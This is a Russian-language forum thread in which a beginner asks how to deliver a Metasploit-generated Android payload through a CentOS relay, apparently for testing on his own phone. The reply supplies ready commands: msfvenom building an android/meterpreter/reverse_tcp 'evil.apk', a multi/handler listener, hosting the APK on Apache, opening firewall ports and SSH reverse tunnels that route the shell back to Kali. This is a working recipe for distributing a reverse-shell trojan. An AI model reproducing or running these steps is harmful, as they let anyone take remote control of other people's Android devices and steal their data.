• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

Возможно, вопрос глупый..

mon3ro

Member
27.06.2020
5
0
BIT
0
Приветствую!

Вкратце, хочу сделать следующий манёвр: Получить доступ к своему Android, скачав вредоносный файл который будет создан в metasploit. Для этого я хочу представить реальную атаку злоумышленника и подключится к так называемому «дедику» но в качестве дедика, буду использовать CentOs. Подскажите, правильно ли я теоретически рассуждаю:

Поднять сервер на Centos, создать ssh ключ, затем по этому ключу подключится с Kali и использовать метасплоит уже не на своём локальном сервере, а на дедике через удалённое управление с Kali.

Будет ли CentOs, работать как промежуточный сервер, для подключения злоумышленника к нему и так же для подключения жертвы, для скачки файла. Или мне не нужно к нему подключаться по SSH а просто при создании полезной нагрузки, указать lhost и Lport CentOs сервера, далее начать работать уже с самим метасплоитом, перекинуть файл .apk в каталог сервера Centos.. откуда его будет качать жертва.. и ждать, пока я сам же его и скачаю на свой андроид. Но как я файл .apk помещу в каталог другого сервера.. Тут как бы мои полномочия, все. Я абсолютный новичек, возможно в моем вопросе абсолютно нет логики. Все совпадения случайны и автор не несёт ответственности за то, что кто-то увидев в комментариях верное решение, будет использовать этот метод в противозаконных деяниях.

Спасибо codeby за возможность задать вопрос.
 

Proxy n1nja

Green Team
28.06.2018
118
149
BIT
0
Если я тебя правильно понял, то для того что бы провернуть то что ты хочешь тебе нужно:
C kali cгенерировать полезную нагрузку например так:
Bash:
msfvenom -p android/meterpreter/reverse_tcp LHOST={IP адресс с CentOS} LPORT=4444 R > evil.apk
На kali поднять листенер который будет слушать порт 4444

Bash:
msf > use multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST {локальный ip машины с kali}
msf exploit(handler) > set LPORT 4444
msf exploit(handler) > exploit
Поднять апач (или любой другой веб сервер)
Код:
sudo service apache2 start
Закинуть свой evil.apk в папку на которую у тебя там веб сервер ссылается, по дефолту /var/www/html
Bash:
cp evil.apk /var/www/html/evil.apk
Далее на CentOS тебе нужно будет открыть порты, в нашем случае 80 и 4444, например так
Код:
iptables -I INPUT -p tcp --dport 4444 -m state --state NEW -j ACCEPT
iptables -I INPUT -p tcp --dport 80 -m state --state NEW -j ACCEPT
/etc/init.d/iptables restart # перезапускаем службу
И прокинуть соеденение до твоей машины с kali linux, я привиду лишь один пример проброса портов, через ssh тунель
С CentOS:
Код:
ssh -R 80:localhost:80 {kali user}@{kali ip}
ssh -R 4444:localhost:4444 {kali user}@{kali ip}
Твой evil.apk будет доступен по http://ip_centOS/evil.apk
А само соеденение будет лететь на твою машину с kali черезе centOS
 
Последнее редактирование:
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!